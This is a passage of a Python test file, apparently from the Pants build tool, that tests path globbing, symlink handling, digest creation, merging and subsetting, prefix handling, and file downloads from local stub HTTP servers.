rule_runner, ["a/b/*.txt"], expected_files=["a/b/1.txt"], expected_dirs=["a", "a/b"]
)
assert_path_globs(
rule_runner, ["c.ln/*.txt"], expected_files=["c.ln/1.txt"], expected_dirs=["c.ln"]
)
assert_path_globs(
rule_runner, ["a/b/*"], expected_files=["a/b/1.txt", "a/b/2"], expected_dirs=["a", "a/b"]
)
assert_path_globs(rule_runner, ["*/0.txt"], expected_files=[], expected_dirs=[])
assert_path_globs(
rule_runner, ["*"], expected_files=["4.txt"], expected_dirs=["a", "c.ln", "d.ln"]
)
assert_path_globs(
rule_runner,
["*/*"],
expected_files=[
"a/3.txt",
"a/4.txt.ln",
"c.ln/1.txt",
"c.ln/2",
"d.ln/3.txt",
"d.ln/4.txt.ln",
],
expected_dirs=FS_TAR_ALL_DIRS,
)
assert_path_globs(
rule_runner,
["*/*/*"],
expected_files=["a/b/1.txt", "a/b/2", "d.ln/b/1.txt", "d.ln/b/2"],
expected_dirs=["a", "a/b", "d.ln", "d.ln/b"],
)
def test_path_globs_rglob_pattern(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(
rule_runner,
["**/*.txt.ln"],
expected_files=["a/4.txt.ln", "d.ln/4.txt.ln"],
expected_dirs=["a", "d.ln"],
)
assert_path_globs(
rule_runner,
["**/*.txt"],
expected_files=[
"4.txt",
"a/3.txt",
"a/b/1.txt",
"c.ln/1.txt",
"d.ln/3.txt",
"d.ln/b/1.txt",
],
expected_dirs=FS_TAR_ALL_DIRS,
)
assert_path_globs(
rule_runner,
["**/3.t*t"],
expected_files=["a/3.txt", "d.ln/3.txt"],
expected_dirs=["a", "d.ln"],
)
assert_path_globs(rule_runner, ["**/*.fake"], expected_files=[], expected_dirs=[])
assert_path_globs(
rule_runner, ["**"], expected_files=FS_TAR_ALL_FILES, expected_dirs=FS_TAR_ALL_DIRS
)
assert_path_globs(
rule_runner, ["**/*"], expected_files=FS_TAR_ALL_FILES, expected_dirs=FS_TAR_ALL_DIRS
)
assert_path_globs(
rule_runner,
["a/**"],
expected_files=["a/3.txt", "a/4.txt.ln", "a/b/1.txt", "a/b/2"],
expected_dirs=["a", "a/b"],
)
assert_path_globs(
rule_runner,
["d.ln/**"],
expected_files=["d.ln/3.txt", "d.ln/4.txt.ln", "d.ln/b/1.txt", "d.ln/b/2"],
expected_dirs=["d.ln", "d.ln/b"],
)
assert_path_globs(rule_runner, ["a/**/3.txt"], expected_files=["a/3.txt"], expected_dirs=["a"])
assert_path_globs(
rule_runner, ["a/**/b/1.txt"], expected_files=["a/b/1.txt"], expected_dirs=["a", "a/b"]
)
assert_path_globs(rule_runner, ["a/**/2"], expected_files=["a/b/2"], expected_dirs=["a", "a/b"])
def test_path_globs_ignore_pattern(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(
rule_runner,
["**", "!*.ln"],
expected_files=["4.txt", "a/3.txt", "a/b/1.txt", "a/b/2"],
expected_dirs=["a", "a/b"],
)
def test_path_globs_ignore_sock(rule_runner: RuleRunner) -> None:
sock_path = os.path.join(rule_runner.build_root, "sock.sock")
with socket.socket(socket.AF_UNIX) as sock:
sock.bind(sock_path)
assert os.path.exists(sock_path)
assert not os.path.isfile(sock_path)
rule_runner.write_files({"non-sock.txt": ""})
assert_path_globs(
rule_runner,
["**"],
expected_files=["non-sock.txt"],
expected_dirs=[],
)
def test_path_globs_remove_duplicates(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(
rule_runner, ["*", "**"], expected_files=FS_TAR_ALL_FILES, expected_dirs=FS_TAR_ALL_DIRS
)
assert_path_globs(
rule_runner,
["**/*.txt", "a/b/1.txt", "4.txt"],
expected_files=[
"4.txt",
"a/3.txt",
"c.ln/1.txt",
"d.ln/3.txt",
"a/b/1.txt",
"d.ln/b/1.txt",
],
expected_dirs=FS_TAR_ALL_DIRS,
)
def test_path_globs_parent_link(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(
rule_runner,
["c.ln/../3.txt"],
expected_files=["c.ln/../3.txt"],
expected_dirs=["c.ln", "c.ln/.."],
)
def test_path_globs_symlink_escaping_errors(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
link = os.path.join(rule_runner.build_root, "subdir/escaping")
dest = os.path.join(rule_runner.build_root, "../../..")
relative_symlink(dest, link)
exc_reg = r".*While expanding link.*subdir/escaping.*may not traverse outside of the buildroot"
with pytest.raises(Exception, match=exc_reg):
assert_path_globs(rule_runner, ["subdir/escaping"], expected_files=[], expected_dirs=[])
def test_path_globs_symlink_dead(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
link = os.path.join(rule_runner.build_root, "subdir/dead")
dest = os.path.join(rule_runner.build_root, "this_file_does_not_exist")
relative_symlink(dest, link)
# Because the symlink does not escape, it should be ignored, rather than cause an error.
assert_path_globs(rule_runner, ["subdir/dead"], expected_files=[], expected_dirs=[])
def test_path_globs_symlink_dead_nested(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
link = os.path.join(rule_runner.build_root, "subdir/dead")
dest = os.path.join(
rule_runner.build_root, "this_folder_does_not_exist/this_file_does_not_exist"
)
relative_symlink(dest, link)
# Because the symlink does not escape, it should be ignored, rather than cause an error.
assert_path_globs(rule_runner, ["subdir/dead"], expected_files=[], expected_dirs=[])
def test_path_globs_symlink_loop(rule_runner: RuleRunner) -> None:
# Matching a recursive glob against a link which points to its parent directory would cause
# infinite recursion, so we eagerly error instead.
setup_fs_test_tar(rule_runner)
link = os.path.join(rule_runner.build_root, "subdir/link.ln")
dest = os.path.join(rule_runner.build_root, "subdir")
relative_symlink(dest, link)
exc_reg = r".*Maximum link depth exceeded"
with pytest.raises(Exception, match=exc_reg):
assert_path_globs(rule_runner, ["**"], expected_files=[], expected_dirs=[])
def test_path_globs_to_digest_contents(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
def get_contents(globs: Iterable[str]) -> Set[FileContent]:
return set(rule_runner.request(DigestContents, [PathGlobs(globs)]))
assert get_contents(["4.txt", "a/4.txt.ln"]) == {
FileContent("4.txt", b"four\n"),
FileContent("a/4.txt.ln", b"four\n"),
}
assert get_contents(["c.ln/../3.txt"]) == {FileContent("c.ln/../3.txt", b"three\n")}
# Directories are empty.
assert not get_contents(["a/b"])
assert not get_contents(["c.ln"])
def test_path_globs_to_digest_entries(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
def get_entries(globs: Iterable[str]) -> Set[Union[FileEntry, Directory, SymlinkEntry]]:
return set(rule_runner.request(DigestEntries, [PathGlobs(globs)]))
assert get_entries(["4.txt", "a/4.txt.ln"]) == {
FileEntry(
"4.txt",
FileDigest("ab929fcd5594037960792ea0b98caf5fdaf6b60645e4ef248c28db74260f393e", 5),
),
FileEntry(
"a/4.txt.ln",
FileDigest("ab929fcd5594037960792ea0b98caf5fdaf6b60645e4ef248c28db74260f393e", 5),
),
}
assert get_entries(["c.ln/../3.txt"]) == {
FileEntry(
"c.ln/../3.txt",
FileDigest("f6936912184481f5edd4c304ce27c5a1a827804fc7f329f43d273b8621870776", 6),
)
}
# Directories are empty.
assert get_entries(["a/b"]) == {Directory("a/b")}
assert get_entries(["c.ln"]) == {Directory("c.ln")}
def test_digest_entries_handles_empty_directory(rule_runner: RuleRunner) -> None:
digest = rule_runner.request(
Digest, [CreateDigest([Directory("a/b"), FileContent("a/foo.txt", b"four\n")])]
)
entries = rule_runner.request(DigestEntries, [digest])
assert entries == DigestEntries(
[
Directory("a/b"),
FileEntry(
"a/foo.txt",
FileDigest("ab929fcd5594037960792ea0b98caf5fdaf6b60645e4ef248c28db74260f393e", 5),
),
]
)
def test_digest_entries_handles_symlinks(rule_runner: RuleRunner) -> None:
digest = rule_runner.request(
Digest,
[
CreateDigest(
[
SymlinkEntry("a.ln", "a.txt"),
SymlinkEntry("b.ln", "b.txt"),
FileContent("a.txt", b"four\n"),
]
)
],
)
entries = rule_runner.request(DigestEntries, [digest])
assert entries == DigestEntries(
[
SymlinkEntry("a.ln", "a.txt"),
FileEntry(
"a.txt",
FileDigest("ab929fcd5594037960792ea0b98caf5fdaf6b60645e4ef248c28db74260f393e", 5),
),
SymlinkEntry("b.ln", "b.txt"),
]
)
@pytest.mark.parametrize(
"create_digest, files, dirs",
[
pytest.param(
CreateDigest(
[
FileContent("file.txt", b"four\n"),
SymlinkEntry("symlink", "file.txt"),
SymlinkEntry("relsymlink", "./file.txt"),
SymlinkEntry("a/symlink", "../file.txt"),
SymlinkEntry("a/b/symlink", "../../file.txt"),
]
),
("a/b/symlink", "a/symlink", "file.txt", "relsymlink", "symlink"),
("a", "a/b"),
id="simple",
),
pytest.param(
CreateDigest(
[
FileContent("file.txt", b"four\n"),
SymlinkEntry(
"circular1", "./circular1"
), # After so many traversals, we give up
SymlinkEntry("circular2", "circular2"), # After so many traversals, we give up
SymlinkEntry("chain1", "chain2"),
SymlinkEntry("chain2", "chain3"),
SymlinkEntry("chain3", "chain1"),
SymlinkEntry(
"a/symlink", "file.txt"
), # looks for a/file.txt, which doesn't exist
SymlinkEntry("a/too-far.ln", "../../file.txt"), # went too far up
SymlinkEntry("a/parent", ".."),
SymlinkEntry("too-far.ln", "../file.txt"), # went too far up
SymlinkEntry("absolute1.ln", str(Path(__file__).resolve())), # absolute path
SymlinkEntry("absolute2.ln", "/file.txt"),
]
),
("file.txt",),
("a",),
id="ignored",
),
pytest.param(
CreateDigest(
[
FileContent("file.txt", b"four\n"),
SymlinkEntry("a/b/parent-file.ln", "../../file.txt"),
SymlinkEntry("dirlink", "a"),
]
),
("a/b/parent-file.ln", "dirlink/b/parent-file.ln", "file.txt"),
("a", "a/b", "dirlink", "dirlink/b"),
id="parentdir-in-symlink-target",
),
pytest.param(
CreateDigest(
[
FileContent("a/file.txt", b"four\n"),
SymlinkEntry("dirlink", "a"),
SymlinkEntry("double-dirlink", "dirlink"),
]
),
("a/file.txt", "dirlink/file.txt", "double-dirlink/file.txt"),
("a", "dirlink", "double-dirlink"),
id="double-dirlink",
),
pytest.param(
CreateDigest(
[
FileContent("a/file.txt", b"four\n"),
SymlinkEntry("a/self", "."),
]
),
tuple(f"a/{'self/' * count}file.txt" for count in range(64)),
("a",),
id="self-dir",
),
],
)
def test_snapshot_and_contents_are_symlink_oblivious(
rule_runner: RuleRunner,
create_digest: CreateDigest,
files: tuple[str, ...],
dirs: tuple[str, ...],
) -> None:
digest = rule_runner.request(Digest, [create_digest])
snapshot = rule_runner.request(Snapshot, [digest])
assert snapshot.files == files
assert snapshot.dirs == dirs
contents = rule_runner.request(DigestContents, [digest])
assert tuple(content.path for content in contents) == files
def test_glob_match_error_behavior(rule_runner: RuleRunner, caplog) -> None:
setup_fs_test_tar(rule_runner)
test_name = f"{__name__}.{test_glob_match_error_behavior.__name__}()"
def evaluate_path_globs(globs: Iterable[str], error_behavior: GlobMatchErrorBehavior) -> None:
pg = PathGlobs(
globs,
glob_match_error_behavior=error_behavior,
description_of_origin=(
test_name if error_behavior != GlobMatchErrorBehavior.ignore else None
),
)
rule_runner.request(Snapshot, [pg])
with pytest.raises(Exception) as exc:
evaluate_path_globs(["not-a-file.txt"], GlobMatchErrorBehavior.error)
assert f'Unmatched glob from {test_name}: "not-a-file.txt"' in str(exc.value)
with pytest.raises(Exception) as exc:
evaluate_path_globs(["not-a-file.txt", "!ignore.txt"], GlobMatchErrorBehavior.error)
assert f'Unmatched glob from {test_name}: "not-a-file.txt", exclude: "ignore.txt"' in str(
exc.value
)
# TODO: get Rust logging working with RuleRunner.
# caplog.clear()
# evaluate_path_globs(["not-a-file.txt"], GlobMatchErrorBehavior.warn)
# assert len(caplog.records) == 1
# assert f'Unmatched glob from {test_name}: "not-a-file.txt"' in caplog.text
caplog.clear()
evaluate_path_globs(["not-a-file.txt"], GlobMatchErrorBehavior.ignore)
assert len(caplog.records) == 0
# -----------------------------------------------------------------------------------------------
# `PathGlobsAndRoot`
# -----------------------------------------------------------------------------------------------
def test_snapshot_from_outside_buildroot(rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
Path(temp_dir, "roland").write_text("European Burmese")
snapshot = rule_runner.scheduler.capture_snapshots(
[PathGlobsAndRoot(PathGlobs(["*"]), temp_dir)]
)[0]
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DIGEST
def test_multiple_snapshots_from_outside_buildroot(rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
Path(temp_dir, "roland").write_text("European Burmese")
Path(temp_dir, "susannah").write_text("I don't know")
snapshots = rule_runner.scheduler.capture_snapshots(
[
PathGlobsAndRoot(PathGlobs(["roland"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["susannah"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["doesnotexist"]), temp_dir),
]
)
assert len(snapshots) == 3
assert snapshots[0].files == ("roland",)
assert snapshots[0].digest == ROLAND_DIGEST
assert snapshots[1].files == ("susannah",)
assert snapshots[1].digest == Digest(
"d3539cfc21eb4bab328ca9173144a8e932c515b1b9e26695454eeedbc5a95f6f", 82
)
assert snapshots[2] == EMPTY_SNAPSHOT
def test_snapshot_from_outside_buildroot_failure(rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
with pytest.raises(Exception) as exc:
rule_runner.scheduler.capture_snapshots(
[PathGlobsAndRoot(PathGlobs(["*"]), os.path.join(temp_dir, "doesnotexist"))]
)
assert "doesnotexist" in str(exc.value)
# -----------------------------------------------------------------------------------------------
# `CreateDigest`
# -----------------------------------------------------------------------------------------------
def test_create_empty_directory(rule_runner: RuleRunner) -> None:
res = rule_runner.request(Snapshot, [CreateDigest([Directory("a/")])])
assert res.dirs == ("a",)
assert not res.files
assert res.digest != EMPTY_DIGEST
res = rule_runner.request(
Snapshot, [CreateDigest([Directory("x/y/z"), Directory("m"), Directory("m/n")])]
)
assert res.dirs == ("m", "m/n", "x", "x/y", "x/y/z")
assert not res.files
assert res.digest != EMPTY_DIGEST
def test_create_digest_with_file_entries(rule_runner: RuleRunner) -> None:
# Retrieve some known FileEntry's from the test tar.
setup_fs_test_tar(rule_runner)
file_entries = rule_runner.request(DigestEntries, [PathGlobs(["4.txt", "a/4.txt.ln"])])
# Make a snapshot with just those files.
snapshot = rule_runner.request(Snapshot, [CreateDigest(file_entries)])
assert snapshot.dirs == ("a",)
assert snapshot.files == ("4.txt", "a/4.txt.ln")
assert snapshot.digest != EMPTY_DIGEST
# -----------------------------------------------------------------------------------------------
# `MergeDigests`
# -----------------------------------------------------------------------------------------------
def test_merge_digests(rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
Path(temp_dir, "roland").write_text("European Burmese")
Path(temp_dir, "susannah").write_text("Not sure actually")
(
empty_snapshot,
roland_snapshot,
susannah_snapshot,
both_snapshot,
) = rule_runner.scheduler.capture_snapshots(
(
PathGlobsAndRoot(PathGlobs(["doesnotmatch"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["roland"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["susannah"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["*"]), temp_dir),
)
)
empty_merged = rule_runner.request(Digest, [MergeDigests((empty_snapshot.digest,))])
assert empty_snapshot.digest == empty_merged
roland_merged = rule_runner.request(
Digest, [MergeDigests((roland_snapshot.digest, empty_snapshot.digest))]
)
assert roland_snapshot.digest == roland_merged
both_merged = rule_runner.request(
Digest, [MergeDigests((roland_snapshot.digest, susannah_snapshot.digest))]
)
assert both_snapshot.digest == both_merged
# -----------------------------------------------------------------------------------------------
# `DigestSubset`
# -----------------------------------------------------------------------------------------------
def generate_original_digest(rule_runner: RuleRunner) -> Digest:
files = [
FileContent(path, b"dummy content")
for path in [
"a.txt",
"b.txt",
"c.txt",
"subdir/a.txt",
"subdir/b.txt",
"subdir2/a.txt",
"subdir2/nested_subdir/x.txt",
]
]
return rule_runner.request(
Digest,
[CreateDigest(files)],
)
def test_digest_subset_empty(rule_runner: RuleRunner) -> None:
subset_snapshot = rule_runner.request(
Snapshot, [DigestSubset(generate_original_digest(rule_runner), PathGlobs(()))]
)
assert subset_snapshot.digest == EMPTY_DIGEST
assert subset_snapshot.files == ()
assert subset_snapshot.dirs == ()
def test_digest_subset_globs(rule_runner: RuleRunner) -> None:
subset_snapshot = rule_runner.request(
Snapshot,
[
DigestSubset(
generate_original_digest(rule_runner),
PathGlobs(("a.txt", "c.txt", "subdir2/**")),
)
],
)
assert set(subset_snapshot.files) == {
"a.txt",
"c.txt",
"subdir2/a.txt",
"subdir2/nested_subdir/x.txt",
}
assert set(subset_snapshot.dirs) == {"subdir2", "subdir2/nested_subdir"}
expected_files = [
FileContent(path, b"dummy content")
for path in [
"a.txt",
"c.txt",
"subdir2/a.txt",
"subdir2/nested_subdir/x.txt",
]
]
subset_digest = rule_runner.request(Digest, [CreateDigest(expected_files)])
assert subset_snapshot.digest == subset_digest
def test_digest_subset_globs_2(rule_runner: RuleRunner) -> None:
subset_snapshot = rule_runner.request(
Snapshot,
[
DigestSubset(
generate_original_digest(rule_runner), PathGlobs(("a.txt", "c.txt", "subdir2/*"))
)
],
)
assert set(subset_snapshot.files) == {"a.txt", "c.txt", "subdir2/a.txt"}
assert set(subset_snapshot.dirs) == {"subdir2", "subdir2/nested_subdir"}
def test_digest_subset_nonexistent_filename_globs(rule_runner: RuleRunner) -> None:
# We behave according to the `GlobMatchErrorBehavior`.
original_digest = generate_original_digest(rule_runner)
globs = ["some_file_not_in_snapshot.txt", "a.txt"]
subset_snapshot = rule_runner.request(
Snapshot, [DigestSubset(original_digest, PathGlobs(globs))]
)
assert set(subset_snapshot.files) == {"a.txt"}
expected_digest = rule_runner.request(
Digest, [CreateDigest([FileContent("a.txt", b"dummy content")])]
)
assert subset_snapshot.digest == expected_digest
# TODO: Fix this to actually error.
# with pytest.raises(ExecutionError):
# rule_runner.request(
# Snapshot,
# [
# DigestSubset(
# original_digest,
# PathGlobs(
# globs,
# glob_match_error_behavior=GlobMatchErrorBehavior.error,
# conjunction=GlobExpansionConjunction.all_match,
# description_of_origin="test",
# ),
# )
# ],
# )
# -----------------------------------------------------------------------------------------------
# `Digest` -> `Snapshot`
# -----------------------------------------------------------------------------------------------
def test_lift_digest_to_snapshot(rule_runner: RuleRunner) -> None:
prime_store_with_roland_digest(rule_runner)
snapshot = rule_runner.request(Snapshot, [ROLAND_DIGEST])
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DIGEST
def test_error_lifting_file_digest_to_snapshot(rule_runner: RuleRunner) -> None:
prime_store_with_roland_digest(rule_runner)
# A file digest is not a directory digest. Here, we hash the file that was primed as part of
# that directory, and show that we can't turn it into a Snapshot.
text = b"European Burmese"
hasher = hashlib.sha256()
hasher.update(text)
digest = Digest(fingerprint=hasher.hexdigest(), serialized_bytes_length=len(text))
with pytest.raises(ExecutionError) as exc:
rule_runner.request(Snapshot, [digest])
assert "unknown directory" in str(exc.value)
# -----------------------------------------------------------------------------------------------
# `AddPrefix` and `RemovePrefix`
# -----------------------------------------------------------------------------------------------
def test_add_prefix(rule_runner: RuleRunner) -> None:
digest = rule_runner.request(
Digest,
[CreateDigest([FileContent("main.ext", b""), FileContent("subdir/sub.ext", b"")])],
)
# Two components.
output_digest = rule_runner.request(Digest, [AddPrefix(digest, "outer_dir/middle_dir")])
snapshot = rule_runner.request(Snapshot, [output_digest])
assert sorted(snapshot.files) == [
"outer_dir/middle_dir/main.ext",
"outer_dir/middle_dir/subdir/sub.ext",
]
assert sorted(snapshot.dirs) == [
"outer_dir",
"outer_dir/middle_dir",
"outer_dir/middle_dir/subdir",
]
# Empty.
output_digest = rule_runner.request(Digest, [AddPrefix(digest, "")])
assert digest == output_digest
# Illegal.
with pytest.raises(Exception, match=r"The `prefix` must be relative."):
rule_runner.request(Digest, [AddPrefix(digest, "../something")])
def test_remove_prefix(rule_runner: RuleRunner) -> None:
relevant_files = (
"characters/dark_tower/roland",
"characters/dark_tower/susannah",
)
all_files = (
"books/dark_tower/gunslinger",
"characters/altered_carbon/kovacs",
*relevant_files,
"index",
)
with temporary_dir() as temp_dir:
safe_file_dump(os.path.join(temp_dir, "index"), "books\ncharacters\n")
safe_file_dump(
os.path.join(temp_dir, "characters", "altered_carbon", "kovacs"),
"Envoy",
makedirs=True,
)
tower_dir = os.path.join(temp_dir, "characters", "dark_tower")
safe_file_dump(os.path.join(tower_dir, "roland"), "European Burmese", makedirs=True)
safe_file_dump(os.path.join(tower_dir, "susannah"), "Not sure actually", makedirs=True)
safe_file_dump(
os.path.join(temp_dir, "books", "dark_tower", "gunslinger"),
"1982",
makedirs=True,
)
snapshot, snapshot_with_extra_files = rule_runner.scheduler.capture_snapshots(
[
PathGlobsAndRoot(PathGlobs(["characters/dark_tower/*"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["**"]), temp_dir),
]
)
# Check that we got the full snapshots that we expect
assert snapshot.files == relevant_files
assert snapshot_with_extra_files.files == all_files
# Strip empty prefix:
zero_prefix_stripped_digest = rule_runner.request(
Digest, [RemovePrefix(snapshot.digest, "")]
)
assert snapshot.digest == zero_prefix_stripped_digest
# Strip a non-empty prefix shared by all files:
stripped_digest = rule_runner.request(
Digest, [RemovePrefix(snapshot.digest, "characters/dark_tower")]
)
assert stripped_digest == Digest(
fingerprint="71e788fc25783c424db555477071f5e476d942fc958a5d06ffc1ed223f779a8c",
serialized_bytes_length=162,
)
expected_snapshot = assert_single_element(
rule_runner.scheduler.capture_snapshots([PathGlobsAndRoot(PathGlobs(["*"]), tower_dir)])
)
assert expected_snapshot.files == ("roland", "susannah")
assert stripped_digest == expected_snapshot.digest
# Try to strip a prefix which isn't shared by all files:
with pytest.raises(Exception) as exc:
rule_runner.request(
Digest,
[RemovePrefix(snapshot_with_extra_files.digest, "characters/dark_tower")],
)
assert (
"Cannot strip prefix characters/dark_tower from root directory (Digest "
"with hash Fingerprint<28c47f77867f0c8d577d2ada2f06b03fc8e5ef2d780e8942713b26c5e3f434b8>)"
" - root directory contained non-matching directory named: books and file named: index"
) in str(exc.value)
# -----------------------------------------------------------------------------------------------
# `DownloadFile`
# -----------------------------------------------------------------------------------------------
@pytest.fixture
def downloads_rule_runner() -> RuleRunner:
return RuleRunner(rules=[QueryRule(Snapshot, [DownloadFile])], isolated_local_store=True)
class StubHandler(BaseHTTPRequestHandler):
response_text = b"Hello, client!"
def do_HEAD(self):
self.send_headers()
def do_GET(self):
self.send_headers()
self.wfile.write(self.response_text)
def send_headers(self):
code = 200 if self.path == "/file.txt" else 404
self.send_response(code)
self.send_header("Content-Type", "text/utf-8")
self.send_header("Content-Length", f"{len(self.response_text)}")
self.end_headers()
def stub_erroring_handler(error_count_value: int) -> type[BaseHTTPRequestHandler]:
"""Return a handler that errors once mid-download before succeeding for the next GET.
This function returns an anonymous class so that each call can create a new instance with its
own error counter.
"""
error_num = 1
class StubErroringHandler(BaseHTTPRequestHandler):
error_count = error_count_value
response_text = b"Hello, client!"
def do_HEAD(self):
self.send_headers()
def do_GET(self):
self.send_headers()
nonlocal error_num
if error_num <= self.error_count:
msg = f"Returning error {error_num}"
error_num += 1
raise Exception(msg)
self.wfile.write(self.response_text)
def send_headers(self):
code = 200 if self.path == "/file.txt" else 404
self.send_response(code)
self.send_header("Content-Type", "text/utf-8")
self.send_header("Content-Length", f"{len(self.response_text)}")
self.end_headers()
return StubErroringHandler
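# Illustrative note (comments only, not used by the tests below): because
# `error_num` lives in a per-call closure, handlers created separately keep
# independent counters, e.g.
#   handler_once = stub_erroring_handler(1)   # would fail only the first GET
#   handler_twice = stub_erroring_handler(2)  # would fail the first two GETs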
DOWNLOADS_FILE_DIGEST = FileDigest(
"8fcbc50cda241aee7238c71e87c27804e7abc60675974eaf6567aa16366bc105", 14
)
DOWNLOADS_EXPECTED_DIRECTORY_DIGEST = Digest(
"4c9cf91fcd7ba1abbf7f9a0a1c8175556a82bee6a398e34db3284525ac24a3ad", 84
)
ROLAND_DOWNLOAD_DIGEST = Digest(
"9341f76bef74170bedffe51e4f2e233f61786b7752d21c2339f8ee6070eba819", 82
)
def test_download_valid(downloads_rule_runner: RuleRunner) -> None:
with http_server(StubHandler) as port:
snapshot = downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/file.txt", DOWNLOADS_FILE_DIGEST)]
)
assert snapshot.files == ("file.txt",)
assert snapshot.digest == DOWNLOADS_EXPECTED_DIRECTORY_DIGEST
def test_download_missing_file(downloads_rule_runner: RuleRunner) -> None:
with pytest.raises(ExecutionError) as exc:
with http_server(StubHandler) as port:
downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/notfound", DOWNLOADS_FILE_DIGEST)]
)
assert "404" in str(exc.value)
def test_download_body_error_retry(downloads_rule_runner: RuleRunner) -> None:
with http_server(stub_erroring_handler(1)) as port:
snapshot = downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/file.txt", DOWNLOADS_FILE_DIGEST)]
)
assert snapshot.files == ("file.txt",)
assert snapshot.digest == DOWNLOADS_EXPECTED_DIRECTORY_DIGEST
def test_download_body_error_retry_eventually_fails(downloads_rule_runner: RuleRunner) -> None:
# Returns one more error than the retry will allow.
with http_server(stub_erroring_handler(5)) as port:
with pytest.raises(Exception):
_ = downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/file.txt", DOWNLOADS_FILE_DIGEST)]
)
def test_download_wrong_digest(downloads_rule_runner: RuleRunner) -> None:
file_digest = FileDigest(
DOWNLOADS_FILE_DIGEST.fingerprint, DOWNLOADS_FILE_DIGEST.serialized_bytes_length + 1
)
with pytest.raises(ExecutionError) as exc:
with http_server(StubHandler) as port:
downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/file.txt", file_digest)]
)
assert "wrong digest" in str(exc.value).lower()
def test_download_file(downloads_rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
roland = Path(temp_dir, "roland")
roland.write_text("European Burmese")
snapshot = downloads_rule_runner.request(
Snapshot,
[DownloadFile(f"file:{roland}", ROLAND_FILE_DIGEST)],
)
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DOWNLOAD_DIGEST
def test_download_caches(downloads_rule_runner: RuleRunner) -> None:
# We put the expected content in the store, but because we have never fetched it from this
# URL, we confirm the URL and attempt to refetch. Once it is cached, it does not need to be
# refetched.
prime_store_with_roland_digest(downloads_rule_runner)
with temporary_dir() as temp_dir:
roland = Path(temp_dir, "roland")
roland.write_text("European Burmese")
snapshot = downloads_rule_runner.request(
Snapshot,
[DownloadFile(f"file:{roland}", ROLAND_FILE_DIGEST)],
)
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DOWNLOAD_DIGEST
def test_download_https() -> None:
# This also tests that the custom certs functionality works.
with temporary_dir() as temp_dir:
def write_resource(name: str) -> Path:
path = Path(temp_dir) / name
data = pkgutil.get_data("pants.engine.internals", f"fs_test_data/tls/rsa/{name}")
assert data is not None
path.write_bytes(data)
return path
server_cert = write_resource("server.crt")
server_key = write_resource("server.key")
cert_chain = write_resource("server.chain")
rule_runner = RuleRunner(
rules=[QueryRule(Snapshot, [DownloadFile])],
isolated_local_store=True,
ca_certs_path=str(cert_chain),
)
ssl_context = ssl.SSLContext()
ssl_context.load_cert_chain(certfile=str(server_cert), keyfile=str(server_key))
with http_server(StubHandler, ssl_context=ssl_context) as port:
snapshot = rule_runner.request(
Snapshot,
[DownloadFile(f"https://localhost:{port}/file.txt", DOWNLOADS_FILE_DIGEST)],
)
assert snapshot.files == ("file.txt",)
assert snapshot.digest == DOWNLOADS_EXPECTED_DIRECTORY_DIGEST
# -----------------------------------------------------------------------------------------------
# `Workspace` and `.write_digest()`
# -----------------------------------------------------------------------------------------------
def test_write_digest_scheduler(rule_runner: RuleRunner) -> None:
prime_store_with_roland_digest(rule_runner)
path = Path(rule_runner.build_root, "roland")
assert not path.is_file()
rule_runner.scheduler.write_digest(ROLAND_DIGEST)
assert path.is_file()
assert path.read_text() == "European Burmese"
rule_runner.scheduler.write_digest(ROLAND_DIGEST, path_prefix="test/")
path = Path(rule_runner.build_root, "test/roland")
assert path.is_file()
assert path.read_text() == "European Burmese"
def test_write_digest_workspace(rule_runner: RuleRunner) -> None:
workspace = Workspace(rule_runner.scheduler, _enforce_effects=False)
digest = rule_runner.request(
Digest,
[CreateDigest([FileContent("a.txt", b"hello"), FileContent("subdir/b.txt", b"goodbye")])],
)
path1 = Path(rule_runner.build_root, "a.txt")
path2 = Path(rule_runner.build_root, "subdir/b.txt")
assert not path1.is_file()
assert not path2.is_file()
workspace.write_digest(digest)
assert path1.is_file()
assert path2.is_file()
assert path1.read_text() == "hello"
assert path2.read_text() == "goodbye"
workspace.write_digest(digest, path_prefix="prefix")
path1 = Path(rule_runner.build_root, "prefix/a.txt")
path2 = Path(rule_runner.build_root, "prefix/subdir/b.txt")
assert path1.is_file()
assert path2.is_file()
assert path1.read_text() == "hello"
assert path2.read_text() == "goodbye"
def test_write_digest_workspace_clear_paths(rule_runner: RuleRunner) -> None:
workspace = Workspace(rule_runner.scheduler, _enforce_effects=False)
digest_a = rule_runner.request(
Digest,
[CreateDigest([FileContent("newdir/a.txt", b"hello")])],
)
digest_b = rule_runner.request(
Digest,
[CreateDigest([FileContent("newdir/b.txt", b"goodbye")])],
)
digest_c = rule_runner.request(
Digest,
[CreateDigest([FileContent("newdir/c.txt", b"hello again")])],
)
digest_c_root = rule_runner.request(
Digest, [CreateDigest([FileContent("c.txt", b"hello again")])]
)
digest_d = rule_runner.request(
